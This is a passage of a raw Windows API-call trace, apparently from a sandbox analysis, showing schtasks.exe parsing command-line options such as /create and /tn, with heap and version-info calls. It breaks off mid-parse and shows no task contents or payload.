returned 3 [0176.642] StrStrIW (lpFirst="|delete|", lpSrch="|f|") returned 0x0 [0176.642] RtlRestoreLastWin32Error () returned 0x490 [0176.642] lstrlenW (lpString="query") returned 5 [0176.642] lstrlenW (lpString="query") returned 5 [0176.642] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.642] lstrlenW (lpString="f") returned 1 [0176.642] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.642] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x8, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|query|") returned 7 [0176.642] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|f|") returned 3 [0176.642] lstrlenW (lpString="|query|") returned 7 [0176.642] lstrlenW (lpString="|f|") returned 3 [0176.642] StrStrIW (lpFirst="|query|", lpSrch="|f|") returned 0x0 [0176.642] RtlRestoreLastWin32Error () returned 0x490 [0176.642] lstrlenW (lpString="change") returned 6 [0176.642] lstrlenW (lpString="change") returned 6 [0176.642] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.643] lstrlenW (lpString="f") returned 1 [0176.643] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.643] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|change|") returned 8 [0176.643] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|f|") returned 3 [0176.643] lstrlenW (lpString="|change|") returned 8 [0176.643] lstrlenW (lpString="|f|") returned 3 [0176.643] StrStrIW (lpFirst="|change|", lpSrch="|f|") returned 0x0 [0176.643] RtlRestoreLastWin32Error () returned 0x490 [0176.643] lstrlenW (lpString="run") returned 3 [0176.643] lstrlenW (lpString="run") returned 3 [0176.643] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.643] lstrlenW (lpString="f") returned 1 [0176.643] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.643] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|run|") returned 5 [0176.643] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|f|") returned 3 [0176.643] lstrlenW (lpString="|run|") returned 5 [0176.643] lstrlenW (lpString="|f|") returned 3 [0176.643] StrStrIW (lpFirst="|run|", lpSrch="|f|") returned 0x0 [0176.643] RtlRestoreLastWin32Error () returned 0x490 [0176.643] lstrlenW (lpString="end") returned 3 [0176.643] lstrlenW (lpString="end") returned 3 [0176.644] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.644] lstrlenW (lpString="f") returned 1 [0176.644] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.644] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|end|") returned 5 [0176.644] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|f|") returned 3 [0176.644] lstrlenW (lpString="|end|") returned 5 [0176.644] lstrlenW (lpString="|f|") returned 3 [0176.644] StrStrIW (lpFirst="|end|", lpSrch="|f|") returned 0x0 [0176.644] RtlRestoreLastWin32Error () returned 0x490 [0176.644] lstrlenW (lpString="showsid") returned 7 [0176.644] lstrlenW (lpString="showsid") returned 7 [0176.644] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.644] lstrlenW (lpString="f") returned 1 [0176.644] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.644] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0xa, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|showsid|") returned 9 [0176.644] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|f|") returned 3 [0176.644] lstrlenW (lpString="|showsid|") returned 9 [0176.644] lstrlenW (lpString="|f|") returned 3 [0176.644] StrStrIW (lpFirst="|showsid|", lpSrch="|f|") returned 0x0 [0176.644] RtlRestoreLastWin32Error () returned 0x490 [0176.644] RtlRestoreLastWin32Error () returned 0x490 [0176.644] RtlRestoreLastWin32Error () returned 0x0 [0176.645] lstrlenW (lpString="/f") returned 2 [0176.645] StrChrIW (lpStart="/f", wMatch=0x3a) returned 0x0 [0176.645] RtlRestoreLastWin32Error () returned 0x490 [0176.645] RtlRestoreLastWin32Error () returned 0x0 [0176.645] lstrlenW (lpString="/f") returned 2 [0176.645] GetProcessHeap () returned 0x47c0000 [0176.645] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x6) returned 0x47c6ba0 [0176.645] GetProcessHeap () returned 0x47c0000 [0176.645] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c9318 [0176.645] RtlRestoreLastWin32Error () returned 0x0 [0176.645] GetProcessHeap () returned 0x47c0000 [0176.645] GetProcessHeap () returned 0x47c0000 [0176.645] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c6c60) returned 1 [0176.645] GetProcessHeap () returned 0x47c0000 [0176.645] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c6c60) returned 0x8 [0176.645] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c6c60) returned 1 [0176.645] GetProcessHeap () returned 0x47c0000 [0176.645] GetProcessHeap () returned 0x47c0000 [0176.645] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c9558) returned 1 [0176.645] GetProcessHeap () returned 0x47c0000 [0176.645] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c9558) returned 0x14 [0176.645] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c9558) returned 1 [0176.645] GetProcessHeap () returned 0x47c0000 [0176.645] GetProcessHeap () returned 0x47c0000 [0176.645] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c8fb0) returned 1 [0176.646] GetProcessHeap () returned 0x47c0000 [0176.646] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c8fb0) returned 0x22 [0176.646] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c8fb0) returned 1 [0176.646] GetProcessHeap () returned 0x47c0000 [0176.646] GetProcessHeap () returned 0x47c0000 [0176.646] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c94b8) returned 1 [0176.646] GetProcessHeap () returned 0x47c0000 [0176.646] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c94b8) returned 0x14 [0176.646] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c94b8) returned 1 [0176.646] GetProcessHeap () returned 0x47c0000 [0176.646] GetProcessHeap () returned 0x47c0000 [0176.646] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c27d8) returned 1 [0176.646] GetProcessHeap () returned 0x47c0000 [0176.646] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c27d8) returned 0x8 [0176.646] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c27d8) returned 1 [0176.646] GetProcessHeap () returned 0x47c0000 [0176.646] GetProcessHeap () returned 0x47c0000 [0176.646] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c9598) returned 1 [0176.646] GetProcessHeap () returned 0x47c0000 [0176.646] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c9598) returned 0x14 [0176.646] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c9598) returned 1 [0176.648] GetProcessHeap () returned 0x47c0000 [0176.648] GetProcessHeap () returned 0x47c0000 [0176.648] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c7658) returned 1 [0176.648] GetProcessHeap () returned 0x47c0000 [0176.648] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c7658) returned 0x10 [0176.648] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c7658) returned 1 [0176.648] GetProcessHeap () returned 0x47c0000 [0176.648] GetProcessHeap () returned 0x47c0000 [0176.648] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c9498) returned 1 [0176.648] GetProcessHeap () returned 0x47c0000 [0176.648] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c9498) returned 0x14 [0176.648] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c9498) returned 1 [0176.648] GetProcessHeap () returned 0x47c0000 [0176.648] GetProcessHeap () returned 0x47c0000 [0176.648] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c6628) returned 1 [0176.648] GetProcessHeap () returned 0x47c0000 [0176.648] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c6628) returned 0x8 [0176.649] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c6628) returned 1 [0176.649] GetProcessHeap () returned 0x47c0000 [0176.649] GetProcessHeap () returned 0x47c0000 [0176.649] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c94d8) returned 1 [0176.649] GetProcessHeap () returned 0x47c0000 [0176.649] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c94d8) returned 0x14 [0176.649] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c94d8) returned 1 [0176.649] GetProcessHeap () returned 0x47c0000 [0176.649] GetProcessHeap () returned 0x47c0000 [0176.649] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cad98) returned 1 [0176.649] GetProcessHeap () returned 0x47c0000 [0176.649] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47cad98) returned 0x60 [0176.649] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47cad98) returned 1 [0176.649] GetProcessHeap () returned 0x47c0000 [0176.649] GetProcessHeap () returned 0x47c0000 [0176.649] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c9618) returned 1 [0176.649] GetProcessHeap () returned 0x47c0000 [0176.649] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c9618) returned 0x14 [0176.649] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c9618) returned 1 [0176.649] GetProcessHeap () returned 0x47c0000 [0176.649] GetProcessHeap () returned 0x47c0000 [0176.649] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c6890) returned 1 [0176.649] GetProcessHeap () returned 0x47c0000 [0176.649] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c6890) returned 0x8 [0176.650] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c6890) returned 1 [0176.650] GetProcessHeap () returned 0x47c0000 [0176.650] GetProcessHeap () returned 0x47c0000 [0176.650] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c9698) returned 1 [0176.650] GetProcessHeap () returned 0x47c0000 [0176.650] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c9698) returned 0x14 [0176.650] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c9698) returned 1 [0176.650] GetProcessHeap () returned 0x47c0000 [0176.650] GetProcessHeap () returned 0x47c0000 [0176.650] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47ca9d8) returned 1 [0176.650] GetProcessHeap () returned 0x47c0000 [0176.650] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47ca9d8) returned 0x10 [0176.650] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47ca9d8) returned 1 [0176.650] GetProcessHeap () returned 0x47c0000 [0176.650] GetProcessHeap () returned 0x47c0000 [0176.650] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c96d8) returned 1 [0176.650] GetProcessHeap () returned 0x47c0000 [0176.650] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c96d8) returned 0x14 [0176.650] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c96d8) returned 1 [0176.650] GetProcessHeap () returned 0x47c0000 [0176.650] GetProcessHeap () returned 0x47c0000 [0176.650] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c6ba0) returned 1 [0176.650] GetProcessHeap () returned 0x47c0000 [0176.651] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c6ba0) returned 0x6 [0176.651] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c6ba0) returned 1 [0176.651] GetProcessHeap () returned 0x47c0000 [0176.651] GetProcessHeap () returned 0x47c0000 [0176.651] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c9318) returned 1 [0176.651] GetProcessHeap () returned 0x47c0000 [0176.651] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c9318) returned 0x14 [0176.651] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c9318) returned 1 [0176.651] GetProcessHeap () returned 0x47c0000 [0176.651] GetProcessHeap () returned 0x47c0000 [0176.651] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c7730) returned 1 [0176.651] GetProcessHeap () returned 0x47c0000 [0176.651] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c7730) returned 0x10 [0176.651] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c7730) returned 1 [0176.652] RtlRestoreLastWin32Error () returned 0x0 [0176.652] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0176.652] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0176.652] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0176.652] RtlVerifyVersionInfo (VersionInfo=0xdce60, TypeMask=0x3, ConditionMask=0x1801b) returned 0x0 [0176.652] RtlRestoreLastWin32Error () returned 0x0 [0176.652] lstrlenW (lpString="create") returned 6 [0176.652] StrChrIW (lpStart="create", wMatch=0x7c) returned 0x0 [0176.652] RtlRestoreLastWin32Error () returned 0x490 [0176.652] RtlRestoreLastWin32Error () returned 0x0 [0176.652] lstrlenW (lpString="create") returned 6 [0176.652] GetProcessHeap () returned 0x47c0000 [0176.652] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c94b8 [0176.652] GetProcessHeap () returned 0x47c0000 [0176.652] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x10) returned 0x47cab58 [0176.652] _memicmp (_Buf1=0x47cab58, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.652] GetProcessHeap () returned 0x47c0000 [0176.652] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x16) returned 0x47c9498 [0176.652] RtlRestoreLastWin32Error () returned 0x0 [0176.652] _memicmp (_Buf1=0x47c7568, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.652] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x47c8cd0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20 [0176.653] GetFileVersionInfoSizeExW (in: dwFlags=0x1, lpwstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0xdcf6c | out: lpdwHandle=0xdcf6c) returned 0x76c [0176.653] GetProcessHeap () returned 0x47c0000 [0176.653] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x776) returned 0x47c9da8 [0176.653] GetFileVersionInfoExW (in: dwFlags=0x3, lpwstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x776, lpData=0x47c9da8 | out: lpData=0x47c9da8) returned 1 [0176.653] VerQueryValueW (in: pBlock=0x47c9da8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xdcf74, puLen=0xdcf78 | out: lplpBuffer=0xdcf74*=0x47ca158, puLen=0xdcf78) returned 1 [0176.653] _memicmp (_Buf1=0x47c7568, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.653] _vsnwprintf (in: _Buffer=0x47c8cd0, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0xdcf58 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0176.653] VerQueryValueW (in: pBlock=0x47c9da8, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0xdcf84, puLen=0xdcf80 | out: lplpBuffer=0xdcf84*=0x47c9f88, puLen=0xdcf80) returned 1 [0176.653] lstrlenW (lpString="schtasks.exe") returned 12 [0176.653] lstrlenW (lpString="schtasks.exe") returned 12 [0176.653] lstrlenW (lpString=".EXE") returned 4 [0176.653] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe" [0176.654] lstrlenW (lpString="schtasks.exe") returned 12 [0176.654] lstrlenW (lpString=".EXE") returned 4 [0176.654] lstrlenW (lpString="schtasks") returned 8 [0176.654] lstrlenW (lpString="/create") returned 7 [0176.654] _memicmp (_Buf1=0x47c7568, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.654] _vsnwprintf (in: _Buffer=0x47c8cd0, _BufferCount=0x19, _Format="%s %s", _ArgList=0xdcf58 | out: _Buffer="schtasks /create") returned 16 [0176.654] _memicmp (_Buf1=0x47c7718, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.654] GetProcessHeap () returned 0x47c0000 [0176.654] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c9338 [0176.654] _memicmp (_Buf1=0x47c75b0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.654] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x47ca788, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0176.654] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0176.654] GetProcessHeap () returned 0x47c0000 [0176.654] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x30) returned 0x47cad98 [0176.654] _vsnwprintf (in: _Buffer=0x47c69d0, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0xdcf5c | out: _Buffer="Type \"SCHTASKS /CREATE /?\" for usage.") returned 37 [0176.654] GetProcessHeap () returned 0x47c0000 [0176.654] GetProcessHeap () returned 0x47c0000 [0176.654] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c9da8) returned 1 [0176.654] GetProcessHeap () returned 0x47c0000 [0176.654] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c9da8) returned 0x776 [0176.654] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c9da8) returned 1 [0176.654] RtlRestoreLastWin32Error () returned 0x0 [0176.654] GetThreadLocale () returned 0x409 [0176.654] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0176.655] lstrlenW (lpString="create") returned 6 [0176.655] GetThreadLocale () returned 0x409 [0176.655] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0176.655] lstrlenW (lpString="?") returned 1 [0176.655] GetThreadLocale () returned 0x409 [0176.655] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0176.655] lstrlenW (lpString="s") returned 1 [0176.655] GetThreadLocale () returned 0x409 [0176.655] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0176.655] lstrlenW (lpString="u") returned 1 [0176.655] GetThreadLocale () returned 0x409 [0176.655] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0176.655] lstrlenW (lpString="p") returned 1 [0176.655] GetThreadLocale () returned 0x409 [0176.655] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0176.655] lstrlenW (lpString="ru") returned 2 [0176.655] GetThreadLocale () returned 0x409 [0176.655] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0176.655] lstrlenW (lpString="rp") returned 2 [0176.655] GetThreadLocale () returned 0x409 [0176.655] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0176.655] lstrlenW (lpString="sc") returned 2 [0176.655] GetThreadLocale () returned 0x409 [0176.655] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0176.655] lstrlenW (lpString="mo") returned 2 [0176.655] GetThreadLocale () returned 0x409 [0176.656] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0176.656] lstrlenW (lpString="d") returned 1 [0176.656] GetThreadLocale () returned 0x409 [0176.656] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0176.656] lstrlenW (lpString="m") returned 1 [0176.656] GetThreadLocale () returned 0x409 [0176.656] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0176.656] lstrlenW (lpString="i") returned 1 [0176.656] GetThreadLocale () returned 0x409 [0176.656] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0176.656] lstrlenW (lpString="tn") returned 2 [0176.656] GetThreadLocale () returned 0x409 [0176.656] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0176.656] lstrlenW (lpString="tr") returned 2 [0176.656] GetThreadLocale () returned 0x409 [0176.656] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0176.656] lstrlenW (lpString="st") returned 2 [0176.656] GetThreadLocale () returned 0x409 [0176.656] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0176.656] lstrlenW (lpString="sd") returned 2 [0176.656] GetThreadLocale () returned 0x409 [0176.656] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0176.656] lstrlenW (lpString="ed") returned 2 [0176.656] GetThreadLocale () returned 0x409 [0176.656] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0176.656] lstrlenW (lpString="it") returned 2 [0176.656] GetThreadLocale () returned 0x409 [0176.656] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0176.656] lstrlenW (lpString="et") returned 2 [0176.656] GetThreadLocale () returned 0x409 [0176.657] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0176.657] lstrlenW (lpString="k") returned 1 [0176.657] GetThreadLocale () returned 0x409 [0176.657] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0176.657] lstrlenW (lpString="du") returned 2 [0176.657] GetThreadLocale () returned 0x409 [0176.657] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0176.657] lstrlenW (lpString="ri") returned 2 [0176.657] GetThreadLocale () returned 0x409 [0176.657] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0176.657] lstrlenW (lpString="z") returned 1 [0176.657] GetThreadLocale () returned 0x409 [0176.657] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0176.657] lstrlenW (lpString="f") returned 1 [0176.657] GetThreadLocale () returned 0x409 [0176.657] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0176.657] lstrlenW (lpString="v1") returned 2 [0176.657] GetThreadLocale () returned 0x409 [0176.657] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0176.657] lstrlenW (lpString="xml") returned 3 [0176.657] GetThreadLocale () returned 0x409 [0176.657] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0176.657] lstrlenW (lpString="ec") returned 2 [0176.657] GetThreadLocale () returned 0x409 [0176.657] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0176.657] lstrlenW (lpString="rl") returned 2 [0176.657] GetThreadLocale () returned 0x409 [0176.657] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0176.658] lstrlenW (lpString="delay") returned 5 [0176.658] GetThreadLocale () returned 0x409 [0176.658] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0176.658] lstrlenW (lpString="np") returned 2 [0176.658] GetThreadLocale () returned 0x409 [0176.658] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0176.658] lstrlenW (lpString="hresult") returned 7 [0176.658] RtlRestoreLastWin32Error () returned 0x0 [0176.658] RtlRestoreLastWin32Error () returned 0x0 [0176.658] lstrlenW (lpString="/create") returned 7 [0176.658] lstrlenW (lpString="-/") returned 2 [0176.658] StrChrIW (lpStart="-/", wMatch=0x30002f) returned="/" [0176.658] lstrlenW (lpString="create") returned 6 [0176.658] lstrlenW (lpString="create") returned 6 [0176.658] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.658] lstrlenW (lpString="create") returned 6 [0176.658] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.658] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|create|") returned 8 [0176.658] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|create|") returned 8 [0176.658] lstrlenW (lpString="|create|") returned 8 [0176.658] lstrlenW (lpString="|create|") returned 8 [0176.658] StrStrIW (lpFirst="|create|", lpSrch="|create|") returned="|create|" [0176.659] RtlRestoreLastWin32Error () returned 0x0 [0176.659] RtlRestoreLastWin32Error () returned 0x0 [0176.659] RtlRestoreLastWin32Error () returned 0x0 [0176.659] lstrlenW (lpString="/tn") returned 3 [0176.659] lstrlenW (lpString="-/") returned 2 [0176.659] StrChrIW (lpStart="-/", wMatch=0x30002f) returned="/" [0176.659] lstrlenW (lpString="create") returned 6 [0176.659] lstrlenW (lpString="create") returned 6 [0176.659] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.659] lstrlenW (lpString="tn") returned 2 